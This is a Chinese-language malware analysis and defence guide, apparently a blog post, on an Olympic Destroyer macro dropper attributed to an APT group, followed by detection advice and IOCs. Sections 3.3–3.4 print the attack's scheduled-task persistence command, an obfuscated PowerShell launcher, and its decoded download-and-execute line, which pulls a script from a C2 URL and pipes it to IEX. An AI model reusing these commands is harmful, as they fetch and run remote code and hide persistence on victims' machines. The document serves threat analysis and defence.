新一波Olympic Destroyer Droppers出现
字数 1616 2025-08-18 17:33:04
Olympic Destroyer Droppers 技术分析与防御指南
1. 概述
Olympic Destroyer 是由 Hades APT 组织开发的一种恶意软件,主要用于针对特定目标的高级持续性威胁(APT)攻击。本文档将详细分析其最新变种的技术特点、攻击流程和防御措施。
2. 样本基本信息
- MD5: cd15a7c3cb1725dc9d21160c26ab9c2e
- 文件名: "ТЕХНИЧЕСКОЕ_ЗАДАНИЕ_НА_РАЗРАБОТКУ_МОБИЛЬНОГО_ПРИЛОЖЕНИЯ.doc" (俄语,意为"移动应用开发技术规范")
- 创建日期: 2018-10-09 07:23:00
- 作者: James
3. 攻击流程分析
3.1 初始感染阶段
-
诱饵文档:
- 初始显示为空白页
- 启用宏后,宏将白色文本变为黑色,显示实际内容
- 内容来源于网络的合法文档,具有高度欺骗性
-
WMI反分析:
- 使用WMI查询运行进程
- 将进程名与40多种分析工具进行比较
- 检查进程数量(至少40个)以识别沙箱环境
3.2 反分析技术
检测的分析工具列表:
HaCKER, MalzILlA, pRocExP, WiREShARK, HxD, PowERsheLl_iSE, idA, Olly,
fiDDLEr, mALwAre, VmtoOLsd, SWingBoX, vboXTrAY, secunia, hijack,
VmtoOlsd', Vbox, vMWaRE, VXsTReaM, AUtOIt, vmToOls, TcpVIeW,
WiREShARK, prOCEss expLorer, VIsuAl bASiC, fiDDLEr
3.3 持久化与执行
-
释放HTA文件:
- 路径:
%APPDATA%\WPFT532.hta
- 路径:
-
计划任务创建:
schtasks /Create /F /SC DAILY /ST "10:20" /TN "DriveCloudTaskCoreCheck" /TR "mshta C:\\Users\\[user]\\AppData\\Roaming\\WPFT532.hta"- 参数说明:
/F: 强制创建任务/SC: 计划每日任务/ST: 开始时间/TN: 任务名称
- 参数说明:
-
HTA执行:
- 使用VBScript解码下一阶段命令行
- 技术与宏阶段相同
3.4 Powershell下载与执行
混淆的Powershell命令:
c:\\WiNDOws\\sYsTEM32\\Cmd.eXE /c "Set AYW= -jOIn[CHAr[]] (40 ,39 , 40 , 78,39, 43,39 , 101, 119, 45, 79,39, 43 ,39 , 98,106 , 101 ,99 ,116 , 32 , 78,101 , 116 , 46 ,87, 39 , 43, 39 ,101 , 98 , 99 , 108, 105 ,101 ,110, 116 , 41,39 , 43 ,39,46,39,43 ,39 ,100 , 111,119 , 110 ,108 , 111 ,39,43 ,39, 97 , 100,115 ,116,114,105 , 110 , 103,40 ,72 ,108, 39,43,39, 106,104,116 , 39 , 43 , 39 , 116 ,112, 58 , 39, 43,39 , 47, 47, 102 ,105, 110 , 100 , 117, 112 , 100, 97 ,39 , 43,39 , 116 ,101,39 ,43,39 , 109, 115 ,46,99 ,111, 109 , 47,99 , 104,39, 43,39, 101, 39 , 43 , 39,99 , 107 ,47,105 ,110,39 ,43 , 39 , 100 , 101 , 120,72,108, 106, 41,39 ,43 ,39, 52, 106 , 39,43,39 , 122,73 , 69,88, 39, 41 ,46 ,82 ,101, 112, 76 , 97,67,101, 40 ,40 ,91 , 99, 104,65 , 114 ,93,55, 50,43 ,91, 99, 104,65 , 114, 93,49,48,56, 43,91 ,99, 104,65 ,114,93,49, 48 ,54 , 41, 44,91,83,116 , 114, 73 ,110,103, 93 ,91 ,99 ,104,65, 114 ,93,51, 57 , 41, 46 ,82,101,112,76, 97, 67 ,101, 40 , 40,91,99, 104, 65, 114, 93, 53 ,50, 43 ,91 , 99 ,104, 65, 114 , 93,49,48,56, 43, 91 ,99, 104, 65,114,93 , 49 , 50 ,50,41,44, 39, 124 , 39 ,41 , 124 , 32, 46 , 32 , 40 , 32 ,36, 69, 110 ,86 , 58,67 , 79, 109 , 83, 80, 101 , 99 ,91,52 , 44 ,50, 52 ,44 ,50,53, 93 , 45 , 106,79 ,73 ,110 ,39 , 39, 41)pshOme[21]+$PSHoMe[30]+'x') &&Set gnPq=ECHO inVOKe-ExPRessiON (get-ItEM eNV:AYw).valUe ^| pOWERsHElL -noPRoFI -EXEcuTiONpOlI BYPASS -noNi -NoeXi -WindoWStYlE HIdDen -&& c:\\WiNDOws\\sYsTEM32\\Cmd.eXE /c %gNpq%"
去混淆后的Powershell阶段1:
('(N'+'ew-O'+'bject Net.W'+'ebclient)'+'.'+'downlo'+'adstring(Hl'+'jht'+'tp:'+'//findupda'+'te'+'ms.com/ch'+'e'+'ck/in'+'dexHlj)'+'4j'+'zIEX').RepLaCe(([chAr]72+[chAr]108+[chAr]106),[StrIng][chAr]39).RepLaCe(([chAr]52+[chAr]106+[chAr]122),'|')
去混淆后的Powershell阶段2:
(New-Object Net.Webclient).downloadstring('http://findupdatems.com/check/index')|IEX
4. 技术特征
4.1 元数据特征
- 文档作者通常为: James, john 或 AV Dummy
4.2 编码与混淆技术
-
字符串编码:
- 使用自定义解码函数(如 MSART8)
- 通过减少每个字符的ASCII值(减一个常数)进行编码
- 不同样本使用不同的常数值
-
十六进制转换:
- 将十六进制字符串转换为文本
4.3 文档诱饵技术
-
移除诱饵图像:
For Each o In ActiveDocument.InlineShapes o.Delete Next o -
文本颜色变化:
ActiveDocument.Range.Font.Hidden = False
4.4 触发器技术
避免使用常见的AutoOpen触发器,使用以下非常规触发器:
MultiPage1_LayoutFrame1_LayoutSystemMonitor1_GotFocus
Image1_MouseMove
ImageCombo21_Change
5. 网络基础设施
- 使用被黑服务器作为C2代理
- 请求被重定向到Empire后台服务器
- 使用修改版的Empire hop.php作为代理
示例请求:
e160ca75a0e8c4bc9177f412b09e7a29 (首次出现: 2018-06-05)
ac85b1fff1fe43ddad28bf1c4ce021c5 (首次出现: 2018-10-11)
6. 防御措施
6.1 预防措施
-
宏安全设置:
- 禁用Office文档中的宏执行
- 或设置为"仅允许受信任位置的宏"
-
用户教育:
- 培训用户识别可疑文档
- 警惕来自未知来源的文档
-
系统加固:
- 限制WMI查询权限
- 禁用不必要的计划任务创建
6.2 检测措施
-
行为监控:
- 监控异常的WMI查询
- 检测计划任务的异常创建
-
网络监控:
- 拦截对已知恶意域名的访问(findupdatems.com等)
- 检测异常的HTTP下载行为
-
文件监控:
- 监控%APPDATA%目录下的HTA文件创建
- 检测文档中的异常宏代码
6.3 响应措施
- 隔离感染主机
- 分析计划任务和持久化机制
- 检查网络连接日志
- 更新杀毒软件特征库
7. IOC (Indicators of Compromise)
-
文件哈希:
- MD5: cd15a7c3cb1725dc9d21160c26ab9c2e
-
网络IOC:
- C2 URL: http://findupdatems.com/check/index
-
文件路径:
- %APPDATA%\WPFT532.hta
- 计划任务名: DriveCloudTaskCoreCheck
8. 总结
Hades APT组织持续进化其Olympic Destroyer恶意软件,最新变种增加了反分析和延迟执行功能,能够有效规避沙箱检测。防御此类攻击需要多层次的安全策略,包括严格的宏安全设置、用户教育和全面的监控措施。